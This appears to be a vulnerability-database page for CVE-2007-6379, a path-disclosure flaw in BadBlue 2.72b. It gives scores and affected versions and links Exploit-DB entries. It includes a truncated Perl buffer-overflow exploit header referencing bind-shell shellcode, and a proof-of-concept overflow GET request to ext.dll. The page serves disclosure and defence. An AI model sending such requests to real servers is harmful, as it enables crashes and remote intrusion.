CVE-2007-6379
Published 2007-12-15
Priority: P4 · 12 · medium · CVSS 2.0: 5
Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N
EXPLOIT
EPSS: 3.28% (86.9th percentile)
BadBlue 2.72b and earlier allows remote attackers to obtain sensitive information via an invalid browse parameter, which reveals the installation path in an error message.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| badblue | badblue | <= 2.72b | — |
No detection rules found.
Exploit-DB
BadBlue 2.72 - PassThru Remote Buffer Overflow
exploitdb·2007-12-24·CVSS 5.0
CVE-2007-6377 [MEDIUM] BadBlue 2.72 - PassThru Remote Buffer Overflow
---
#!/usr/bin/perl -w
# http://aluigi.altervista.org/adv/badblue-adv.txt
# https://www.securityfocus.com/bid/26803
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6379
# exploit for stack overflow in badblue 2.72
#
# Credit to Luigi Auriemma
# Jacopo Cervini [email protected]
# 22/12/2007
#
#
#
use IO::Socket;
if(!($ARGV[1]))
{
print "Usage: badblue-272-seh.pl \n\n";
exit;
}
# metasploit win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum
Exploit-DB
BadBlue 2.72b - Multiple Vulnerabilities
exploitdb·2007-12-10
CVE-2007-6379 BadBlue 2.72b - Multiple Vulnerabilities
---
#######################################################################
Luigi Auriemma
Application: BadBlue
http://www.badblue.com
Versions: badbluebof.txt
GET /ext.dll?mfcisapicommand=PassThru&aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
No writeups or analysis indexed.
http://aluigi.altervista.org/adv/badblue-adv.txt
http://osvdb.org/42418
http://secunia.com/advisories/28031
http://securityreason.com/securityalert/3448
http://www.securityfocus.com/archive/1/484834/100/0/threaded
http://www.securityfocus.com/bid/26803
http://www.vupen.com/english/advisories/2007/4160
Published: 2007-12-15